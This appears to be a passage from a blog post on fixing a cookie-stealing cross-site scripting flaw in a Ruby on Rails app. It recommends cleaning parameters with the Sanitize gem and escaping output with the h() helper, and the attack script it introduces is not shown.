Solution and Fix:
Multiple fixes is needed for this, 1) Escaping on the parameters and 2) Escaping on the output values.
1) Escaping on the parameters (Refer:- https://selvaonrails.wordpress.com/2012/04/03/ruby-on-rails-sanitize-4/)
A check has to be done for escaping the malicious scripts in the parameters with the help of ‘Sanitize’ gem. For example, an attacker can pass some script like below in the scope parameter.
If the above is executed successfully means, the attacker will stole the cookie from the web page. To avoid this, parameters needs to be checked and the scripts needs to be escaped. This can be achieved with the help of ‘Sanitize’ gem with some code like below.
Sanitize.clean(“//value goes here//”)
The above will check for the value of the parameters and escape the scripts, if any.
2) Escaping on the output values
As a second step, it is good practice to escape all output of the application, especially when re-displaying user input, which hasn’t been input-filtered using escapeHTML() or it’s alias h() method to replace the HTML input characters &,”,<,> by their uninterpreted representations in HTML.
Ex:- <%=h @value_to_be_displayed %>
Links for References: